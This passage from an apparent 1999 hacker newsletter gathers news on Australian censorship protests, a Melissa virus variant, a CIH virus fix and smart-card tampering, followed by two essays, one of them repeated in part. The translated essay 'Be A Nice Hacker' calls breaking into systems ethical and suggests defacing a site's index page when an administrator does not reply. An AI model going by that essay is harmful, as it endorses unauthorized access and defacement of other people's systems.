- http://phoz.dk/news/260599.html
-
- @HWA
-
-
- 22.0 EFA Plans Net Censorship Demonstrations
-
- From HNN http://www.hackernews.com/
-
- contributed by photon
- The Electronic Frontiers Australia have announced several protest events to
- take place on Friday May 28. Local groups around Australia have been urged
- to co-ordinate protests against government censorship. Australia's proposed
- internet censorship legislation passed the Senate on Wednesday, and is expected
- to pass through the House of Representatives some time next week.
-
- Electronic Frontiers Australia
- http://www.efa.org.au
-
- Broadcasting Services Amendment (Online Services) Bill 1999
- http://www.ozemail.com/~mbaker/amended.html
-
- List of Australian Representatives
- http://www.aph.gov.au/
-
- Sydney Morning Herald
- http://www.smh.com.au/news/9905/27/pageone/pageone7.html
-
- Thursday, May 27, 1999
-
- Internet providers plotting revenge over bill
-
- By LAUREN MARTIN, in Canberra
-
- Angry Internet service providers turned on the Government after its bill to
- censor the Internet passed the Senate yesterday.
-
- Requests from Government computer users were diverted to a protest page
- which made the users wait 120 seconds before reaching their desired
- destination.
-
- "Get used to the delay," came the message. It was a warning that the plan
- would slow the system.
-
- Civil libertarians also protested by turning their computer Web site screens
- black to mark their belief that the Government had - in the words of
- Democrats Senator Natasha Stott Despoja - "turned its back on the Internet".
-
- Anti-censorship group Electronic Frontiers Australia is organising nationwide
- rallies for tomorrow in the real world - Sydney, Melbourne, Perth, Brisbane,
- Adelaide and Wollongong.
-
- One family-owned Internet provider in western Sydney, RP Internet Services,
- yesterday was offering a month's untimed calls or 500 megabytes of data for
- clients who showed up.
-
- The company hopes to hire a hearse for the Sydney protest, which will move
- from Hyde Park to the offices of the Australian Broadcasting Authority and the
- Office of Film and Literature Classification.
-
- Already one West Australian-based ISP had sent each senator a copy of
- George Orwell's 1984, with a note: "The Online Services Bill is Orwellian in its
- implications. It has no place in a free society."
-
- But the bill is expected to move smoothly through the House of
- Representatives and become law.
-
- It outlines a complaints-based regime under which the ABA can force Internet
- providers to remove material which would be considered offensive or illegal
- under film and video guidelines.
-
- If the material is not removed within one working day, ISPs face penalties of
- tens of thousands of dollars.
-
- The chief executive of the Internet Industry Association, Mr Peter Coroneous,
- said the bill represented a "huge challenge".
-
- "This has never been attempted anywhere in the world before, and people must
- realise that we cannot necessarily come out with a magic bullet tomorrow."
-
- The Communications Minister, Senator Alston, said the bill would "protect
- Australian citizens, especially children" from unsuitable Internet sites.
-
- But EFA president and Internet lawyer, Mr Kim Heitman, said it would not
- protect anyone.
-
- International sites (more than 90 million) could not be effectively blocked, he
- said. Adult sites based in Australia would move offshore or underground.
-
- "The internet is going to effortlessly evade the bill," Mr Heitman said. "It does
- nothing but make us an international laughing stock for saying we can do the
- impossible - it's a con job ...
-
- "If the Government was serious about Internet content, they would pay to
- educate parents and give police the resources to hunt down people who create
- illegal content."
-
-
-
- @HWA
-
- 23.0 Design Principals for Tamper-Resistant Smart Card Processors
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- From HNN http://www.hackernews.com/
-
- contributed by Silicosis
- The Advance Digital Security Research Department of
- the University of Cambridge Computer Laboritory has
- released an excellent paper on the security weaknesses
- of smart cards and describes several methods of
- extracting protected data and software from smart card
- processors. Anyone who has been doing any smart card
- hacking should probably read this.
-
- Design Principals for Tamper-Resistant Smart Card Processors
- http://www.cl.cam.ac.uk/~mgk25/sc99-tamper.pdf
-
- @HWA
-
- 24.0 Melissa finds a mate
- ~~~~~~~~~~~~~~~~~~~~
-
- From HNN http://www.hackernews.com/
-
- Melissa will not Die
-
-
- contributed by nVirb
- Variants of the word Macro virus known as Melissa
- continue to appear. This time the mutant disguises itself
- in a '.rtf' named document as opposed to '.doc' which
- helps to hide it from anti-virus software. It has been
- speculated that Melissa and a virus known as CAP
- discovered in 1997 may have met in the wild and
- mutated together.
-
- PC World
- http://www.pcworld.com/pcwtoday/article/0,1510,11162,00.html
-
-
- Melissa Mutant Appears
-
- Virus variation is disguised as an RTF file and
- hides from vaccines.
-
- by Matthew Nelson, InfoWorld Electric
- May 27, 1999, 3:55 a.m. PT
-
- The Melissa virus, which swept across networks
- around the world last month, has popped up again in a
- mutated format, which may have occurred when it
- came into contact with another virus.
-
- Melissa's latest variation uses a macro virus to
- replicate itself across networks as the original did, but
- now it changes the file extension of the Word
- document from .doc to .rtf. This may effectively
- camouflage the virus from antivirus systems that look
- only for the .doc version of the attack.
-
- The virus is not actually an RTF document, but is a
- Word file masquerading as an RTF file, as RTF files
- cannot contain macros.
-
- "An RTF file cannot contain macros, so it cannot
- contain macro viruses," says Sal Viveros, group
- marketing manager for Total Virus Defense at Network
- Associates, which was contacted about the virus by a
- user. "But with Word you can name your extensions
- any name you want, so all this virus writer did was
- change the list.doc in Melissa to list.rtf."
-
- Mutating in the Wild?
-
- The RTF Melissa virus is similar to the CAP virus,
- which was discovered in 1997 and altered .doc files to
- .rtf files. CAP was summarily added to antivirus
- application lists to guard against.
-
- But given the similarity of the two viruses, and the
- possible results of an interaction between the two,
- Viveros speculates that the two viruses might have met
- and mutated in the wild.
-
- If a system infected with CAP virus also contracted
- Melissa, then CAP could have altered the Melissa files
- to replicate as RTF files and then continued to spread
- the infection.
-
- "It could have been that someone had the CAP virus on
- their system who got infected by Melissa," says
- Viveros. "Maybe it was accidental that this was
- changed to RTF."
-
- There is no way to be sure, Viveros adds. This new
- version of the Melissa virus is one of many copycat
- viruses discovered since the initial outbreak of the virus.
-
- To protect against the latest version of Melissa,
- Network Associates and other antivirus vendors
- recommend that you update your antivirus data
- definitions regularly and be cautious opening
- suspicious messages, especially ones fitting the
- Melissa profile of "Important message from ..".
-
- @HWA
-
- 25.0 punkz.com sets up a feedback page for the presidential 'cyberwar'
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- From HNN http://www.hackernews.com/
-
- The Internet a Tool of War?
-
- contributed by simonsays
- Should the United States use the Internet as a tool of
- war? A page has now been set up where you can email
- the President with your concerns in response the
- allegation that the CIA will break into various banks to
- mess with official Yugoslavian bank accounts.
-
- punkz.com/sixtoed
-
- @HWA
-
- 26.0 Its that time of month again, when the 26th rolls around, look out...
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- I thought we already had a fix for the CIH virus but apparently the
- Aussies want in on the action as well so heres yet another one...-Ed
-
-
- Chernobyl Virus Cure Found in Australia
-
-
- contributed by nvirB
- With the 26th of the month arriving quickly developers
- have been scrambling to create a fix for variants of the
- CIH or Chernobyl Virus which may strike tomorrow. CIH
- attacks a system by corrupting both the the File
- Allocation Table and the BIOS. Developers in Australia
- claim that they have created a program that will rebuild
- the FAT table of an infected system. However, they
- have been unable to solve the BIOS corruption problem.
-
- News.com.au
- http://technology.news.com.au/techno/4286612.htm
-
- Local developer nukes Chernobyl bug
- By IAN GRAYSON
-
- 25may99
-
- A QUEENSLAND software expert has developed a fix for the malevolent
- CIH virus, which corrupts hard drives, making PCs inoperable.
-
- The virus, dubbed Chernobyl because it struck on the anniversary of
- the nuclear accident, hit hundreds of thousands of PCs worldwide on
- April 26.
-
- CIH virus outbreaks have been most prevalent in the Asian region.
-
- Some experts say this is because of the large amount of pirated
- software in use there, and the fact that many CDs were infected at the
- time of manufacture.
-
- A variant of the virus has been found that will trigger tomorrow, and
- could continue to strike on the 26th of each month until it is removed
- from a system.
-
- Virus expert with Queensland firm Hamilton Multi-media, James Wallis,
- said he had created a fix that overcame the impact of the virus,
- allowing users to access data on their hard drives.
-
- "We sat down and figured out exactly how the virus corrupts the disks
- and set out to develop a way to fix it," he said.
-
- Mr Wallis said it took six 14-hour days to create the fix.
-
- The company has made the fix available as a free download from its
- Web site.
-
- He said the virus could be beaten because only data in the first portion
- of a hard drive, including the file allocation table, was corrupted.
-
- The remainder was left intact but inaccessible until the lost section was
- rebuilt.
-
- "Our program starts at the end of the disk and works backwards," he
- said.
-
- "Using sophisticated algorithms, it recreates the data at the beginning
- of the drive."
-
- Mr Wallis said the fix had been used successfully to resurrect more than
- a dozen infected hard drives brought in by customers.
-
- More than 180 copies of the fix had been downloaded from the Web
- site in the week after it was made available.
-
- But Mr Wallis said little could be done for PCs in which the virus had
- also attacked the BIOS chip. "In many cases it is a matter of having to
- replace the chip because there is nothing that can be done in software
- to fix it."
-
-
- 27.0 Submission: "Be A Nice Hacker" by System
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- be a nice hacker...
- by system ( 21st may 1999).
-
-
- --------------------------------------------------------------------------------
-
- [ Introduction. ]
-
- I made this articles because there are so much cracker than a real hackers in
- Indonesia and all over the world.
-
-
-
- --------------------------------------------------------------------------------
-
- [ General description. ]
-
- A hacker is a people that can enter into some computer system without anybody
- know about it. Generally a hacker do not intend to publish this interruption to
- the internet communities, they don't like publication, they only want tray their
- security, isn't it good or bad. If they found their security is bad or weak, they
- will tell the administrator, tell them that there is a hole in their system, and
- suggest the administrator to fix it before something bad happening to their system.
-
- But with these days, this things were being forget by them who call their self a
- hacker. There are so many hacking / cracking scene that only for publication purpose
- at this time. They don't obey the ethics that in behind of underground world.
-
-
-
- --------------------------------------------------------------------------------
-
- [ A details description. ]
-
- Being a hacker, they must remember one thing " DO NOT INTEND TO BREAK THE SYSTEM ".
- We must keep this thing in our self, if you are the real hacker of course. A hacker,
- that I'm already tell you in the front of this articles, only get inside the system,
- looking around, if they find any hole in the system, they will tell the administrator
- the hole. The hacker never break or change the data's that inside that system. Even if
- they have a capabilities to break and change that data's, but look, they only look,
- read, study it, if it is good for their self they keep it on their mind, if not they
- leave it with out a trace.
-
- I know this is probably sound pretty boring for you guy's that just get into this scene,
- and sometime the question that exist in your mind is " So what's the benefit for me ? ".
- Well, the benefit is the knowledge that you get, a hacker never do something for their
- own purpose. They only study and study for getting a lot of knowledge.
-
- So what the deals with this knowledge ?
-
- To answer this question, you must look something that surrounding you. Let we see the
- easy one, the monitor, the keyboard, the cpu, the mouse that you using right now, where
- it come from ? From the science's isn't it ? Where science's come from ? From the
- knowledge isn't it ?
-
- Knowledge is the most important thing in this world, and I believe all knowledge will
- be use, maybe not at this time, but it will in the next couple years or more.
-
- Try to thing objectively, in old time Leonard Da Vinci has paint how the helicopter works
- in his note pad, as all of you know at his time people even don't have any prescription
- about a flying copter. But in a few years later, that could be happened like know. You
- see, that the real value of a knowledge's.
-
- To bad, these value of knowledge's has been forgotten just like that, many of our pal's
- from Indonesia more like to break the system and change the data's that exist on it. One
- thing that really occurred in Indonesia is they only want getting the free internet account
- than the knowledge's. If this still happen in the next couple years, what is the main
- purpose of internet ?
-
- I tell you these for not make a certain people happy, but this negative phenomenon should
- be get away from Indonesia, because Indonesia people can not think smart if they keep using
- the internet in a wrong way.
-
- Some people tell me that this is an equal position, because the telephone and internet fee
- in Indonesia is very expensive if we compare it with the other country. Yes this is true,
- but this is a wrong thinking. Don't look from one side, but look at two side or more. If
- you are in the ISP and Telephone side, you will see what happening to them. They will broke
- if you still do this.
-
- Okay, back to the main subject. Why Indonesian hacker like to break the system ?
-
- I don't sure for 100%, but I think this is happen because they lack of information, especially
- the ethics in underground world. It is our job to tell them so they this is will not happen
- again in the future.
-
- I'm not a hacker, but I will they you some ethics that I know :
-
- - Do not break the system
-
- - Do not change the data's that exist on the system
-
- - Tell the administrator the hole that you have been found
-
- - Don't even try to delete all files in their system. ( If in Web server, please don't delete all
- HTML / Scripts in their directory, if the administrator doesn't respond your email, change the
- index.html with your own word, but keep the old one, rename the old one, for example oldindex.html,
- as I know this only happen if the administrator not respond your email in 48 hours ).
-
- - And for the administrator, your also need to obey the ethics. Keep the hacked version index.html
- for 24 hours.
-
- Let me tell you, if you obey these ethics, people will regret you, even you could be a friend with the administrator for no time.
-
-
- --------------------------------------------------------------------------------
-
- [ Summary. ]
-
- - Being a hacker doesn't mean you will be famous in a short time.
-
- - A hacker jobs is not an easy way.
-
- - A hacker with out the ethics is just a looser mind.
-
- - Remember, hacker only purpose is for knowledge.
-
- ##################################################################
-
- This article is a translate version of " Jadilah hacker yang benar "
- that made by System, at Friday 21st May. You can use this article
- / change it as you like, as long as you give me some credit.
-
- I really like all comments / suggestion from you, please email it to
- system@hackerlink.or.id. Check out http://www.hackerlink.or.id for
- Indonesian underground news center.
-
- ##################################################################
-
-
- @HWA
-
- 28.0 Hacking Memes by Stephen Downes
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- Contributed by Pasty Drone, NewsTrolls
-
-
-
- Hacking Memes
-
-
-
- (Viewing this article is illegal in Australia)
-
- This essay is about subversion.
-
- 1. The Essence of the Meme
-
- The concept of the meme has been working its way around the web for a while
- now, instantiating itself in Wired's regular feature, Hype List, in articles, and in
- general currency.
-
- As David Bennahum writes at the top of each issue of Meme, a meme is a
-
- contagious idea that replicates like a virus, passed on from mind to
- mind. Memes function the same way genes and viruses do, propagating
- through communication networks and face-to-face contact between
- people.
-
- The tune you can't get out of your head, the phrase you keep using in your
- conversation, the image of the perfect donut - these are all memes, ideas which
- have passed from somewhere out there into your head and into your
- consciousness.
-
- Transference is the essence of the meme. Principia Cybernetica Web defines it as
- "an information pattern, held in an individual's memory, which is capable of being
- copied to another individual's memory." The Hacker's Dictionary defines it as "An
- idea considered as a replicator, esp. with the connotation that memes parasitize
- people into propagating them much as viruses do."
-
- The concept, we are told, originates in Richard Dawkins's 1976 book The Selfish
- Gene. The word 'meme' sounds like 'gene' and has similar properties. Humans,
- from the point of view of either gene or meme, are the means by which genes - or
- memes - are propogated. Animals, plants, and even ourselves, are merely their
- disposable "survival machines".
-
- Our human capacity to communicate consists in our ability to transfer idea from
- one person to another. Not to say that such transference is perfect. We all know
- the story where the message gets changed as it is whispered ear to ear down a line
- of people. But it is reliable. Most of the time, the receiver gets the information the
- sender wanted to convey.
-
- Different forms of communication operate more or less effectively. A casual
- conversation you have on the bus will be forgotten by day's end, while this essay
- may linger in your mind a few days longer. Neither conversation nor essay,
- however, has the staying power of the McDonald's jingle (sing it with me: You
- deserve a break today...). Mere transference is not sufficient. For an idea to take
- hold in another person, it must be internalized, it must be what Dreyfus and Dreyfus
- call the expert, or intuitive, state of knowledge.
-
- From the standpoint of humans, ideas are the currency of the information
- economy. An idea which replicates well is worth money, because the idea that
- implants itself of intuitive knowledge acts as a determinate of behaviour. The best
- way to get a person to buy your product or to use your service is to internalize it, to
- make dialing 10-10-800 an action. In advertising it's an old rule of thumb: mention
- the product name three times in a 15 second spot.
-
- As Andrew Garton laments,
-
- The record industry maintains its status in the global economy and its
- income streams by way of repetition. Music that is played over and over
- again so much that it creates its own audience that in turn purchase its
- representation to listen to it over and over again in their homes, their
- cars, walkmans, bathrooms... anywhere one can think to place a
- speaker.
-
- Ideas - and not just advertising - transmit themsleves through repetition.
-
-
- Hacking Memes
-
-
-
- 2. Advertising
-
- Repetition alone worked in the old days of limited media. When the sources of
- information were few and uniform, when there were three networks and one
- message. Today's consumers are not only more sophisticated - merely making
- them remember is no longer enough - consumers are the battleground for
- information wars, with messages flying at them from all directions. Drive down any
- city street and look at the images: one in ten (if you're lucky) is an actual traffic
- signal; the rest are trying to implant some idea, some behaviour, into your mind.
-
- Advertising today looks for stronger hooks, and it finds them in association and
- self-identification. The concept is especially simple: find (or define) a person's
- conception of self which is is pleasing. Mold that conception such that the use of a
- product or service is essential to that conception. Imprint the idea that in order to
- be yourself, you need to purchase such-and-such a brand.
-
- Nike, for example, understands this. After losing market share to Reebok, Nike's
- new advertising campaign focussed less and less on shoes and more and more on
- image. As Randall Lane explains in a recent Forbes article,
-
- Nike's Phil Knight isn't selling shoes. He's selling attitude....
-
- Nike would sell not shoes but the athletic ideals of determination,
- individuality, self-sacrifice and winning....
-
- Nike ads almost never pitch product--or even mention the company's
- name. They create a mood, an attitude, and then associate the product
- with that mood. Call it image transfer. Cool ads, cool product. As Wieden
- puts it: "We don't set out to make ads. The ultimate goal is to make a
- connection."
-
- The idea behind Nike's ads is to transfer a sense of identity from the person to the
- product.
-
-
- Hacking Memes
-
-
-
- 3. The Corporate Pitch
-
- People living in western democracies are flooded with advertising. The illusion is
- sustained that they are being offered choice, but in reality, they are being presented
- with a uniform message. Western society does not consist of many cultures,
- rather, more and more, they are being subsumed into a single culture.
-
- The reality of this hit home for me when I found myself listening to - and enjoying -
- Meredith Brooks's recent top 10 song, Bitch I realized I was watching an
- advertisement for the movie Practical Magic. Brooks's song - fresh, rebellious,
- catchy - was appropriated and incorporated into the larger media package. Indeed,
- it seems that most popular music today ties in with a movie or television show -
- and that most movies and television shows tie in with additional product lines.
-
- These tie-ins define not only the breadth but also the limits of popular culture. Even
- rebellion is commodified - if it is not commodified, it is not shown. 'Culture' in our
- society, both from the popular point of view and even in academic studies - means
- 'mass culture', as defined by the tightly woven network of the mass media meme.
- As author and pundit Carrie McLaren complains:
-
- The real disappointment lies in (scholars') abject inability to recognize
- 'popular culture' anywhere but in the officially-sanctioned showplaces
- of corporate America; their utter dependence on television to provide
- them with an imagery of rebellion.
-
- Or as Mark Dery observes in his classic essay, Culture Jamming,
-
- Corporate ownership of the newsmedia, the subsumption of an
- ever-larger number of publishing companies and television networks
- into an ever-smaller number of multinationals, and the increased
- privatization of truth by an information-rich, technocratic elite are not
- newly-risen issues. More recent is the notion that the public mind is
- being colonized by corporate phantasms---wraithlike images of power
- and desire that haunt our dreams.
-
-
- Hacking Memes
-
-
-
- 4. Hyper Reality
-
- Steve Mizrach, Culture Jamming: The Information War of the 90s:
-
- the French philosopher Baudrillard calls our postmodern existence
- "hyperreality." Real experiences and things have been replaced with
- simulacra - copies without an original. Due to the power of mass media
- advertising, our relationship to the signifier has changed. Now it hides
- the absence of a signified: conceals the inability to deliver real
- satisfaction by cleverly simulating it. Part of our hyperreal lives is the
- fact that our simulations are more real than real. Given a better imitation,
- people choose it over the real thing; hence Disney's Matterhorn enjoys
- more visitors than the real one in Switzerland. More insidiously, through
- various obfuscations, people come to think the simulacrum is the real
- McCoy, and forget about the historical and physical reality it represents.
-
- Modern advertising critics like Mark Crispin Miller often note the hidden
- messages concealed within the cool graphics and media saturation of
- Madison Avenue and MTV. Originally, they suggest, advertising often
- connected the product being sold with some sort of self-image or way of
- life (pastoral, pleasant, family-oriented.) Often, it was conveyed that the
- product would somehow confer various advantages - popularity,
- sexiness, fame, success, power, even individuality. Today, ads are filled
- with a strange sort of rugged selfishness, misanthropy, and
- mean-spiritedness ("touch my doritos and die.") A person is told sternly
- to buy as much as they can of the product but never to share with
- friends. "Get your own," they're told. While various moral crusaders
- seek to combat the various sexual innuendos of TV programming, they
- rarely challenge the more subtle but socially disruptive images found in
- commercials and other advertising.
-
- The product, no longer able to offer satisfaction on its own ground ("a
- potato chip is a chip is a chip"), instead offers the consumer a chance to
- be part of a certain 'crowd' or 'scene.' They belong to a cool "product
- tribe," revelling in the image and sensibility that the product somehow
- mystically confers - the fetishism of commodities, hyperaccelerated for
- Generation X. Analysts of postindustrial America suggest this is the
- secret hidden within these advertising campaigns - that more and more
- people are being sold style, image, and celebrity, since there is no
- substance or material satisfaction to the product-in-itself. Concealed
- within the jump-cut flash of postmodern advertising is a simple code:
- consumption is a mode of transcendence, a way to take part in
- something larger than yourself, "the Pepsi Generation."
-
- Corporations utilize various techniques to carve Americans into
- various market profiles - not based on what products they use, but on
- what media messages they respond to. In other words, they
- are to be sold on the images they want to project to themselves and
- others, and not on the intrinsic usefulness of consumer items.
- Whatever values they supposedly respond to, are translated into
- clever pitches, suggesting that the product somehow represents or
- embodies those values. Subliminal seduction has never been that
- important in advertising, despite the hype, but the use of semiotic
- strategies certainly has. Products are often "pitched" to specific ethnic
- groups, minorities, or sub-cultures, often using the Marcusian
- co-optation strategy of appealing to their own sense of difference or
- deviance. ("Wear our clothes, and then you'll be a real rebel.")
-
-
- Hacking Memes
-
-
-
- 5. The Information War
-
- Jesse Hirsh:
-
- didn't you hear? they've declared information war against everybody.
- yep, that's right, the digital economy is really the perpetual war
- economy. Like genesis the great flood is on, only we're the ones being
- flooded, or rather bombarded by information, seeking our conversion to
- the holy faith of consumerism, otherwise known as virtual reality.
-
- and of course in declaring war the state has identified its enemies and
- scapegoats: hackers, phreakers, and anarchists, all of whom are
- presumed terrorists.
-
- We tend to think of the media message as pertaining to
- products and services only, and to restrict our concept
- of the tie-ins to toys, clothing, and running shoes. But
- the uniform image being broadcast extends well
- beyond consumer purchases; it is devoted to creating
- and maintaining the consumer society. No element of life is sacrosanct; all
- elements of society are infused.
-
- On the one hand, non-corporate forms of information - any information - are
- attacked. In some cases, the strategy is straight-forwardly political. Herbert Schiller,
- as quoted by Dery:
-
- The commercialization of information, its private acquisition and sale,
- has become a major industry. While more material than ever before, in
- formats created for special use, is available at a price, free public
- information supported by general taxation is attacked by the private
- sector as an unacceptable form of subsidy...An individual's ability to
- know the actual circumstances of national and international existence
- has progressively diminished.
-
- In Canada and other nations, we see this as the incessant attacks on public
- broadcasting networks such as the Canadian Broadcasting Corporation.
-
- On another front, it involves attacking the integrity and
- credibility of alternative news sources. A recent
- National Post article on the CBC's coverage of
- biotechnology is typical. The author, Terence Corcoran,
- writes scathingly,
-
- Ideology certainly dominated CBC Radio's
- This Morning show yesterday. Reporter Don
- Carty is a smooth-talking manipulator of
- words who gives his slanted reports a thin
- veneer of objectivity.
-
- The corporate culture strives for the middle ground, to portray themselves as
- objective and neutral; any position from outside that camp is ridiculed as "biased"
- and "political".
-
- Alternatively, public media can be co-opted. Hence, for
- example, the sale of the educational Access Network by the
- Government of Alberta to the CHUM Media Group. Or the
- infiltration of the American Public Broadcasting System by
- corporate interests, with - as Carrie McLaren observes,
- inevitable results:
-
- In the wake of the Disney/ABC merger, a Young and
- Rubicam (huge advertising firm) survey of 8,500 brands
- worldwide concluded that the most eligible brand for
- acquisition is the Public Broadcasting Service. Surprise,
- the home of "educational" programming like Barney and
- Nova is one big non-commercial commercial. Says
- PBS spokesperson Stu Kantor, "In terms of
- differentiation and personal relevance, it is the No. 2
- (behind Disney) media brand among the total
- population."
-
- The mainstream media's fostering of a sanitary corporate image extends well
- beyond news and advertising. Situation comedies, dramas and movies - the
- mainstream of 'popular culture' - are plagued with product placement and are
- passed through the image scrubber before they air. The NBC's handling of Atomic
- Train is typical of the many instances reported by the Student Activists' Network
- Wayne Grytting,
-
- After heavily promoting the movie's factual basis, NBC suddenly
- changed its mind with "no input" from its parent company, GE, a big
- investor in nuclear power. Alerted to the "fact" that nuclear wastes are
- not transported by trains, they added a disclaimer emphasizing the
- movie's fictional character which they showed at every commercial
- break. Then they overdubbed every mention of nuclear waste with the
- phrase "hazardous waste", thereby achieving the look of a dubbed
- Japanese horror film.
-
- The image of the world that we receive through popular culture - whether in music,
- in the cinema, or on television - is a carefully polished version of reality. Mark Dery:
-
- The commercialization of information, its private acquisition and sale,
- has become a major industry. While more material than ever before, in
- formats created for special use, is available at a price, free public
- information supported by general taxation is attacked by the private
- sector as an unacceptable form of subsidy...An individual's ability to
- know the actual circumstances of national and international existence
- has progressively diminished.
-
- As the band Negativeland writes,
-
- It is simply inconceivable that this daily, never ending stream of public
- suggestion and desire creation has no effect or influence on our spirits,
- our health, our jobs, our laws, our environment, our culture, our political
- process, or our national and international policy.
-
-
- Hacking Memes
-
-
-
- 6. Control of the Classrooms
-
- The battle extends to all corners of the information nation, even into the sanctity of
- the kindergarten classroom. Knowing that repetition and imprinting are key,
- advertisers are keen to infuse their message into the curriculum. Advertisers, for
- example, recently placed their product in mathematics textbooks.
-
- "This looks like product placement, as they do in the movies," said
- David Walsh, director of the National Institute on Media and the Family,
- based in Minneapolis, which studies the effect of advertising on families.
- "The effect is the same. It gets at what I call the golden rule of influence,
- which is when the person being influenced doesn't even know it."
-
- Media groups such as Channel One place television news shows into classrooms.
- As they say on their website,
-
- Channel One News is a daily, televised, 10-minute newscast that is
- beamed via satellite during the school year to each of the 12,000 schools
- in the Channel One Network community. Channel One News features
- stories on breaking news and in-depth issues that affect the world, the
- nation and specifically America's teenagers.
-
- Leaving aside the question of advertising in education, an examination of what
- Channel One considers "news" is revealing. Today's (May 27, 1999) edition asks
- students how they liked Star Wars, covered Alannis Morisette, commented on body
- image, and reported "Live from Mt. Everest".
-
- The message broadcast to students on Channel One is clear: our culture is defined
- by the movies and music we see and hear, our culture is the best, and the best
- path to self-actualization is to immerse ourselves in this culture.
-
- Listen to Channel One on freedom in China:
-
- Behind the Chinese government's restrictions are cultural and historical
- factors. For thousands of years, Chinese culture has been based on
- Confucian values, which people have a respect for authority. The ruler
- of the people is a father figure whom everyone must obey. The Chinese
- government's existing authoritarian style of leadership follows the
- ancient way of emperors who ruled China with "the mandate of
- Heaven." Individualism is not highly valued in Confucianism. Instead,
- people are encouraged to act in the best interest of the family and
- community.
-
- The Chinese culture, according to Channel One, is inherently and irredeemable
- evil, based on authortarian "Confucian" values. Such an account misrepresents
- both Chinese culture and Confucianism. By contrast, the American culture is
- painted in pure tones,
-
- America was founded by English colonists who wanted independence
- from Great Britain. The United States also has become a haven for
- immigrants fleeing religious and ethnic persecution in other countries.
- Because of these historical events, individualism and freedom is highly
- valued in American culture.
-
- Here we have not only an assumption of genetic and racial purity, we also have a
- conflation of "freedom" and "individualism". And - leaving aside the fact that the
- dominant religion in the United States - Christianity - is at least as authoritarian as
- Confucianism, the 'fact' of freedom in the United States is traced to its religious
- roots.
-
- Advertisers have long known that imprinting is best accomplished though
- marketing to kids. The battle for the airwaves and print media has been won. The
- battle for the classrooms of the nations is just being engaged.
-
- Hacking Memes
-
-
-
- 6. Control of the Classrooms
-
- The battle extends to all corners of the information nation, even into the sanctity of
- the kindergarten classroom. Knowing that repetition and imprinting are key,
- advertisers are keen to infuse their message into the curriculum. Advertisers, for
- example, recently placed their product in mathematics textbooks.
-
- "This looks like product placement, as they do in the movies," said
- David Walsh, director of the National Institute on Media and the Family,
- based in Minneapolis, which studies the effect of advertising on families.
- "The effect is the same. It gets at what I call the golden rule of influence,
- which is when the person being influenced doesn't even know it."
-
- Media groups such as Channel One place television news shows into classrooms.
- As they say on their website,
-
- Channel One News is a daily, televised, 10-minute newscast that is
- beamed via satellite during the school year to each of the 12,000 schools
- in the Channel One Network community. Channel One News features
- stories on breaking news and in-depth issues that affect the world, the
- nation and specifically America's teenagers.
-
- Leaving aside the question of advertising in education, an examination of what
- Channel One considers "news" is revealing. Today's (May 27, 1999) edition asks
- students how they liked Star Wars, covered Alannis Morisette, commented on body
- image, and reported "Live from Mt. Everest".
-
- The message broadcast to students on Channel One is clear: our culture is defined
- by the movies and music we see and hear, our culture is the best, and the best
- path to self-actualization is to immerse ourselves in this culture.
-
- Listen to Channel One on freedom in China:
-
- Behind the Chinese government's restrictions are cultural and historical
- factors. For thousands of years, Chinese culture has been based on
- Confucian values, which people have a respect for authority. The ruler
- of the people is a father figure whom everyone must obey. The Chinese
- government's existing authoritarian style of leadership follows the
- ancient way of emperors who ruled China with "the mandate of
- Heaven." Individualism is not highly valued in Confucianism. Instead,
- people are encouraged to act in the best interest of the family and
- community.
-
- The Chinese culture, according to Channel One, is inherently and irredeemable
- evil, based on authortarian "Confucian" values. Such an account misrepresents
- both Chinese culture and Confucianism. By contrast, the American culture is
- painted in pure tones,
-
- America was founded by English colonists who wanted independence
- from Great Britain. The United States also has become a haven for
- immigrants fleeing religious and ethnic persecution in other countries.
- Because of these historical events, individualism and freedom is highly
- valued in American culture.
-
- Here we have not only an assumption of genetic and racial purity, we also have a
- conflation of "freedom" and "individualism". And - leaving aside the fact that the
- dominant religion in the United States - Christianity - is at least as authoritarian as
- Confucianism, the 'fact' of freedom in the United States is traced to its religious
- roots.
-
- Advertisers have long known that imprinting is best accomplished though
- marketing to kids. The battle for the airwaves and print media has been won. The
- battle for the classrooms of the nations is just being engaged.
-
- Hacking Memes
-
-
-
- 7. The Counteroffensive: Words as Weapons
-
- The counteroffensive is being mounted by a variety of forces who - until the advent
- of the internet - had few means of communication and interaction. The
- counteroffensive - an anti-cultural diatribe led by pagans and witches, socialists,
- anarchists and libertarians, webgrrls and riotgrrls, homosexuals and lesbians,
- environmentalists and consumer advocates - has moved from the trenches of
- alternative cafes and billboard defacing to the mainstream of online culture.
-
- The counteroffensive - now armed with the tools of mass media - is a guerilla
- operation using the word as weapon, as described by Dery:
-
- The answer lies, perhaps, in the "semiological guerrilla warfare"
- imagined by Umberto Eco. "[T]he receiver of the message seems to
- have a residual freedom: the freedom to read it in a different way...I am
- proposing an action to urge the audience to control the message and its
- multiple possibilities of interpretation," he writes. "[O]ne medium can be
- employed to communicate a series of opinions on another medium...The
- universe of Technological Communication would then be patrolled by
- groups of communications guerrillas, who would restore a critical
- dimension to passive reception."
-
- Or as the Quebec Public interest Research group puts it,
-
- We can break the homogeneity of the media monopoly by expressing
- ourselves with our own media. Taking back our media means taking
- back our freedom and engaging in a revolution of many minds against a
- common enemy. Through workshops, panel discussions, and lectures,
- events such as Liberating Media seek to encourage and inspire
- participants to take back our media and our freedom in the diversity of
- forms in which they both exist.
-
- The methodology of counterattack involves inserting counter-memes into the
- media mainstream. It is the idea of the meme conceived as virus taken to its logical
- extreme. This idea expresses itself even in Dawkin's seminary The Selfish Gene
- and is operationalized in William S. Burroughs's radical treatise, The Electronic
- Revolution:
-
- The control of the mass media depends on laying down lines of
- association. When the lines are cut the associational connections are
- broken.
-
- I have frequently spoken of word and image as viruses or as acting as
- viruses, and this is not an allegorical comparison.
-
- You will notice that this process is continually subject to random
- juxtapostation. Just what sign did you see in the Green Park station as
- you glanced up from the People? Just who called as you were reading
- your letter in the Times? What were you reading when your wife broke a
- dish in the kitchen? An unreal paper world and yet completely real
- because it is actually happening.
-
- The underground press serves as the only effective counter to a
